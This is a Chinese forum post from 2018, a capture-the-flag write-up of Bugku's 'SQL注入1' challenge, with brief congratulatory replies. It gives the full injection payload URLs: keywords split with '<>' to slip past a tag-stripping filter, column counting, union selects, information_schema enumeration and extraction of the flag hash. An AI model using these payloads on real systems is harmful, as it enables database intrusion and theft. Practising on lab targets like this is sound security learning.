[Writeup] SQL注入1Writeup

[复制链接]
查看7292 | 回复5 | 2018-3-1 15:03:02 | 显示全部楼层 |阅读模式
Bugku——SQL注入1(http://103.238.227.13:10087/file:///C:/Users/wz/AppData/Local/Temp/enhtmlclip/Image.png
1.png
过滤了几乎所有的关键字,尝试绕过无果之后发现,下面有个xss过滤代码。经搜索得该函数会去掉所有的html标签,所以向注入关键字中插入<>,就可以不被检测到,并成功注入;
[size=0.875em]1.首先判断是否存在注入:http://103.238.227.13:10087/?id=1 a<>nd 1=1
2.png
file:///C:/Users/wz/AppData/Local/Temp/enhtmlclip/Image(1).png
http://103.238.227.13:10087/?id=1 a<>nd 1=2
3.png
file:///C:/Users/wz/AppData/Local/Temp/enhtmlclip/Image(2).png
通过这两次的返回结果可初步判断存在注入点。

2.判断字段大小:
http://103.238.227.13:10087/?id=1 o<>rder by 2
4.png
file:///C:/Users/wz/AppData/Local/Temp/enhtmlclip/Image(3).png
http://103.238.227.13:10087/?id=1 o<>rder by 3
5.png
file:///C:/Users/wz/AppData/Local/Temp/enhtmlclip/Image(4).png
根据返回结果可判断字段值为2
3.判断字段的输出位置;
http://103.238.227.13:10087/?id=1 a<>nd 1=2 uni<>on s<>elect 1,2
6.png
file:///C:/Users/wz/AppData/Local/Temp/enhtmlclip/Image(5).png
如图可发现字段内容的输出位置。
4.输出数据库的信息:
7.png
file:///C:/Users/wz/AppData/Local/Temp/enhtmlclip/Image(6).png
可见有一个额外数据库为sql3.
5.查询key表:
http://103.238.227.13:10087/?id=1 a<>nd 1=2 uni<>on s<>elect group_concat(tabl<>e_schema),group_concat(tabl<>e_name) fr<>om info<>rmation_schema.ta<>bles
8.png
file:///C:/Users/wz/AppData/Local/Temp/enhtmlclip/Image(7).png
仔细看输出的数据表的信息,发现因为group_concat()函数的长度限制原因无法打印出全部信息。如下:
file:///C:/Users/wz/AppData/Local/Temp/enhtmlclip/Image(8).png
至此,查询key表失败,未解决。
6.查到信息:
http://103.238.227.13:10087/?id=1 a<>nd 1=2 uni<>on s<>elect 1,hash fr<>om sql3.key
9.png
file:///C:/Users/wz/AppData/Local/Temp/enhtmlclip/Image(9).png
语句中,前半部分SQL语句查询错误信息,后半部分查询我们需要的信息。
查到hash为 c3d3c17b4ca7f791f85e#$1cc72af274af4adef,即为flag。





点评

涨知识  发表于 2018-3-11 21:42
回复

使用道具 举报

王泽CTF | 2018-3-5 18:54:59 | 显示全部楼层
顶一下子-。-
回复

使用道具 举报

匿名 1094461298 | 2018-3-19 14:37:45 | 显示全部楼层
顶一个!!!!
回复

使用道具 举报

ssssss | 2018-11-1 10:46:45 | 显示全部楼层

顶一个!!!!
回复

使用道具 举报

dfish | 2019-4-23 06:58:09 | 显示全部楼层
掌握知识点
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

1

主题

4

帖子

93

积分

小有名气

Rank: 3Rank: 3

积分
93